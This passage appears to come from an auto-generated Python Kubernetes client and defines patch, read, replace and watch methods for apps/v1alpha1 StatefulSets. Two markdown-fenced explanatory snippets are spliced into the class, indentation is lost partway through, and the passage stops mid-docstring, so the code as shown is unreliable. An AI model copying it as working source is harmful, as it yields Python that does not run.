        resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'PATCH',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1alpha1StatefulSet',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        collection_formats=collection_formats)
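    # Illustrative sketch (not part of the generated client): the patch
    # methods above accept several patch Content-Types, including
    # `application/merge-patch+json`. A minimal merge-patch body that would
    # scale a StatefulSet might look like the following; the replica count
    # is an arbitrary example.

```python
import json

# A merge-patch body touches only the fields it wants to change; here,
# just spec.replicas. The nesting mirrors the StatefulSet spec layout.
patch_body = {"spec": {"replicas": 3}}

# The client serializes the patch object to JSON before sending it.
encoded = json.dumps(patch_body)
```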

    def patch_apps_v1alpha1_namespaced_stateful_set_status(self, name, namespace, body, **kwargs):
        """
        partially update status of the specified StatefulSet
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_apps_v1alpha1_namespaced_stateful_set_status(name, namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the StatefulSet (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param UnversionedPatch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1alpha1StatefulSet
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.patch_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, body, **kwargs)
        else:
            (data) = self.patch_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, body, **kwargs)
            return data

    def patch_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(self, name, namespace, body, **kwargs):
        """
        partially update status of the specified StatefulSet
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.patch_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, body, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the StatefulSet (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param UnversionedPatch body: (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :return: V1alpha1StatefulSet
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'body', 'pretty']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method patch_apps_v1alpha1_namespaced_stateful_set_status" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `patch_apps_v1alpha1_namespaced_stateful_set_status`")
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params) or (params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `patch_apps_v1alpha1_namespaced_stateful_set_status`")
        # verify the required parameter 'body' is set
        if ('body' not in params) or (params['body'] is None):
            raise ValueError("Missing the required parameter `body` when calling `patch_apps_v1alpha1_namespaced_stateful_set_status`")

        collection_formats = {}

        resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}/status'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None
        if 'body' in params:
            body_params = params['body']

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['application/json-patch+json', 'application/merge-patch+json', 'application/strategic-merge-patch+json'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'PATCH',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1alpha1StatefulSet',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        collection_formats=collection_formats)

    def read_apps_v1alpha1_namespaced_stateful_set(self, name, namespace, **kwargs):
        """
        read the specified StatefulSet
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.read_apps_v1alpha1_namespaced_stateful_set(name, namespace, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the StatefulSet (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
        :param bool export: Should this value be exported. Export strips fields that a user can not specify.
        :return: V1alpha1StatefulSet
                 If the method is called asynchronously,
                 returns the request thread.
        """
        kwargs['_return_http_data_only'] = True
        if kwargs.get('callback'):
            return self.read_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, **kwargs)
        else:
            (data) = self.read_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, **kwargs)
            return data

    def read_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, name, namespace, **kwargs):
        """
        read the specified StatefulSet
        This method makes a synchronous HTTP request by default. To make an
        asynchronous HTTP request, please define a `callback` function
        to be invoked when receiving the response.
        >>> def callback_function(response):
        >>>     pprint(response)
        >>>
        >>> thread = api.read_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, callback=callback_function)

        :param callback function: The callback function
            for asynchronous request. (optional)
        :param str name: name of the StatefulSet (required)
        :param str namespace: object name and auth scope, such as for teams and projects (required)
        :param str pretty: If 'true', then the output is pretty printed.
        :param bool exact: Should the export be exact. Exact export maintains cluster-specific fields like 'Namespace'
        :param bool export: Should this value be exported. Export strips fields that a user can not specify.
        :return: V1alpha1StatefulSet
                 If the method is called asynchronously,
                 returns the request thread.
        """
        all_params = ['name', 'namespace', 'pretty', 'exact', 'export']
        all_params.append('callback')
        all_params.append('_return_http_data_only')

        params = locals()
        for key, val in iteritems(params['kwargs']):
            if key not in all_params:
                raise TypeError(
                    "Got an unexpected keyword argument '%s'"
                    " to method read_apps_v1alpha1_namespaced_stateful_set" % key
                )
            params[key] = val
        del params['kwargs']

        # verify the required parameter 'name' is set
        if ('name' not in params) or (params['name'] is None):
            raise ValueError("Missing the required parameter `name` when calling `read_apps_v1alpha1_namespaced_stateful_set`")
        # verify the required parameter 'namespace' is set
        if ('namespace' not in params) or (params['namespace'] is None):
            raise ValueError("Missing the required parameter `namespace` when calling `read_apps_v1alpha1_namespaced_stateful_set`")

        collection_formats = {}

        resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}'.replace('{format}', 'json')
        path_params = {}
        if 'name' in params:
            path_params['name'] = params['name']
        if 'namespace' in params:
            path_params['namespace'] = params['namespace']

        query_params = {}
        if 'pretty' in params:
            query_params['pretty'] = params['pretty']
        if 'exact' in params:
            query_params['exact'] = params['exact']
        if 'export' in params:
            query_params['export'] = params['export']

        header_params = {}

        form_params = []
        local_var_files = {}

        body_params = None

        # HTTP header `Accept`
        header_params['Accept'] = self.api_client.\
            select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
        if not header_params['Accept']:
            del header_params['Accept']

        # HTTP header `Content-Type`
        header_params['Content-Type'] = self.api_client.\
            select_header_content_type(['*/*'])

        # Authentication setting
        auth_settings = ['BearerToken']

        return self.api_client.call_api(resource_path, 'GET',
                                        path_params,
                                        query_params,
                                        header_params,
                                        body=body_params,
                                        post_params=form_params,
                                        files=local_var_files,
                                        response_type='V1alpha1StatefulSet',
                                        auth_settings=auth_settings,
                                        callback=params.get('callback'),
                                        _return_http_data_only=params.get('_return_http_data_only'),
                                        collection_formats=collection_formats)
def read_apps_v1alpha1_namespaced_stateful_set_status(self, name, namespace, **kwargs):
"""
read status of the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_apps_v1alpha1_namespaced_stateful_set_status(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.read_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, **kwargs)
else:
(data) = self.read_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, **kwargs)
return data
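The wrapper above follows the generated client's sync/async dispatch convention: force `_return_http_data_only`, then either return the request thread (when a `callback` kwarg is supplied) or the deserialized response data. A minimal standalone sketch of that pattern — `dispatch` and `fake_fetch` are illustrative names, not part of the client; `fake_fetch` stands in for a `*_with_http_info` method:

```python
def dispatch(fetch, *args, **kwargs):
    """Dispatch sync vs. async in the style of the generated wrappers.

    `fetch` stands in for a `*_with_http_info` method: called with a
    truthy `callback` kwarg it returns a thread, otherwise it returns
    the deserialized data.
    """
    kwargs['_return_http_data_only'] = True
    if kwargs.get('callback'):
        # Asynchronous path: the underlying call returns the request thread
        return fetch(*args, **kwargs)
    # Synchronous path: return the response data directly
    data = fetch(*args, **kwargs)
    return data


def fake_fetch(name, **kwargs):
    """Hypothetical stand-in that echoes which path was taken."""
    if kwargs.get('callback'):
        return 'thread'
    return {'name': name}


sync_result = dispatch(fake_fetch, 'web-0')
async_result = dispatch(fake_fetch, 'web-0', callback=len)
```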
def read_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(self, name, namespace, **kwargs):
"""
read status of the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.read_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method read_apps_v1alpha1_namespaced_stateful_set_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `read_apps_v1alpha1_namespaced_stateful_set_status`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `read_apps_v1alpha1_namespaced_stateful_set_status`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}/status'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def replace_apps_v1alpha1_namespaced_stateful_set(self, name, namespace, body, **kwargs):
"""
replace the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_apps_v1alpha1_namespaced_stateful_set(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1StatefulSet body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, **kwargs)
return data
def replace_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, name, namespace, body, **kwargs):
"""
replace the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1StatefulSet body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_apps_v1alpha1_namespaced_stateful_set" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_apps_v1alpha1_namespaced_stateful_set`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def replace_apps_v1alpha1_namespaced_stateful_set_status(self, name, namespace, body, **kwargs):
"""
replace status of the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_apps_v1alpha1_namespaced_stateful_set_status(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1StatefulSet body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.replace_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, body, **kwargs)
else:
(data) = self.replace_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, body, **kwargs)
return data
def replace_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(self, name, namespace, body, **kwargs):
"""
replace status of the specified StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.replace_apps_v1alpha1_namespaced_stateful_set_status_with_http_info(name, namespace, body, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param V1alpha1StatefulSet body: (required)
:param str pretty: If 'true', then the output is pretty printed.
:return: V1alpha1StatefulSet
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'body', 'pretty']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method replace_apps_v1alpha1_namespaced_stateful_set_status" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `replace_apps_v1alpha1_namespaced_stateful_set_status`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `replace_apps_v1alpha1_namespaced_stateful_set_status`")
# verify the required parameter 'body' is set
if ('body' not in params) or (params['body'] is None):
raise ValueError("Missing the required parameter `body` when calling `replace_apps_v1alpha1_namespaced_stateful_set_status`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/namespaces/{namespace}/statefulsets/{name}/status'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'pretty' in params:
query_params['pretty'] = params['pretty']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
if 'body' in params:
body_params = params['body']
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'PUT',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='V1alpha1StatefulSet',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def watch_apps_v1alpha1_namespaced_stateful_set(self, name, namespace, **kwargs):
"""
watch changes to an object of kind StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_apps_v1alpha1_namespaced_stateful_set(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.watch_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, **kwargs)
else:
(data) = self.watch_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, **kwargs)
return data
def watch_apps_v1alpha1_namespaced_stateful_set_with_http_info(self, name, namespace, **kwargs):
"""
watch changes to an object of kind StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_apps_v1alpha1_namespaced_stateful_set_with_http_info(name, namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str name: name of the StatefulSet (required)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['name', 'namespace', 'field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_apps_v1alpha1_namespaced_stateful_set" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'name' is set
if ('name' not in params) or (params['name'] is None):
raise ValueError("Missing the required parameter `name` when calling `watch_apps_v1alpha1_namespaced_stateful_set`")
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_apps_v1alpha1_namespaced_stateful_set`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/watch/namespaces/{namespace}/statefulsets/{name}'.replace('{format}', 'json')
path_params = {}
if 'name' in params:
path_params['name'] = params['name']
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VersionedEvent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def watch_apps_v1alpha1_namespaced_stateful_set_list(self, namespace, **kwargs):
"""
watch individual changes to a list of StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_apps_v1alpha1_namespaced_stateful_set_list(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
kwargs['_return_http_data_only'] = True
if kwargs.get('callback'):
return self.watch_apps_v1alpha1_namespaced_stateful_set_list_with_http_info(namespace, **kwargs)
else:
(data) = self.watch_apps_v1alpha1_namespaced_stateful_set_list_with_http_info(namespace, **kwargs)
return data
def watch_apps_v1alpha1_namespaced_stateful_set_list_with_http_info(self, namespace, **kwargs):
"""
watch individual changes to a list of StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_apps_v1alpha1_namespaced_stateful_set_list_with_http_info(namespace, callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str namespace: object name and auth scope, such as for teams and projects (required)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
"""
all_params = ['namespace', 'field_selector', 'label_selector', 'pretty', 'resource_version', 'timeout_seconds', 'watch']
all_params.append('callback')
all_params.append('_return_http_data_only')
params = locals()
for key, val in iteritems(params['kwargs']):
if key not in all_params:
raise TypeError(
"Got an unexpected keyword argument '%s'"
" to method watch_apps_v1alpha1_namespaced_stateful_set_list" % key
)
params[key] = val
del params['kwargs']
# verify the required parameter 'namespace' is set
if ('namespace' not in params) or (params['namespace'] is None):
raise ValueError("Missing the required parameter `namespace` when calling `watch_apps_v1alpha1_namespaced_stateful_set_list`")
collection_formats = {}
resource_path = '/apis/apps/v1alpha1/watch/namespaces/{namespace}/statefulsets'.replace('{format}', 'json')
path_params = {}
if 'namespace' in params:
path_params['namespace'] = params['namespace']
query_params = {}
if 'field_selector' in params:
query_params['fieldSelector'] = params['field_selector']
if 'label_selector' in params:
query_params['labelSelector'] = params['label_selector']
if 'pretty' in params:
query_params['pretty'] = params['pretty']
if 'resource_version' in params:
query_params['resourceVersion'] = params['resource_version']
if 'timeout_seconds' in params:
query_params['timeoutSeconds'] = params['timeout_seconds']
if 'watch' in params:
query_params['watch'] = params['watch']
header_params = {}
form_params = []
local_var_files = {}
body_params = None
# HTTP header `Accept`
header_params['Accept'] = self.api_client.\
select_header_accept(['application/json', 'application/yaml', 'application/vnd.kubernetes.protobuf', 'application/json;stream=watch', 'application/vnd.kubernetes.protobuf;stream=watch'])
if not header_params['Accept']:
del header_params['Accept']
# HTTP header `Content-Type`
header_params['Content-Type'] = self.api_client.\
select_header_content_type(['*/*'])
# Authentication setting
auth_settings = ['BearerToken']
return self.api_client.call_api(resource_path, 'GET',
path_params,
query_params,
header_params,
body=body_params,
post_params=form_params,
files=local_var_files,
response_type='VersionedEvent',
auth_settings=auth_settings,
callback=params.get('callback'),
_return_http_data_only=params.get('_return_http_data_only'),
collection_formats=collection_formats)
def watch_apps_v1alpha1_stateful_set_list_for_all_namespaces(self, **kwargs):
"""
watch individual changes to a list of StatefulSet
This method makes a synchronous HTTP request by default. To make an
asynchronous HTTP request, please define a `callback` function
to be invoked when receiving the response.
>>> def callback_function(response):
>>> pprint(response)
>>>
>>> thread = api.watch_apps_v1alpha1_stateful_set_list_for_all_namespaces(callback=callback_function)
:param callback function: The callback function
for asynchronous request. (optional)
:param str field_selector: A selector to restrict the list of returned objects by their fields. Defaults to everything.
:param str label_selector: A selector to restrict the list of returned objects by their labels. Defaults to everything.
:param str pretty: If 'true', then the output is pretty printed.
:param str resource_version: When specified with a watch call, shows changes that occur after that particular version of a resource. Defaults to changes from the beginning of history.
:param int timeout_seconds: Timeout for the list/watch call.
:param bool watch: Watch for changes to the described resources and return them as a stream of add, update, and remove notifications. Specify resourceVersion.
:return: VersionedEvent
If the method is called asynchronously,
returns the request thread.
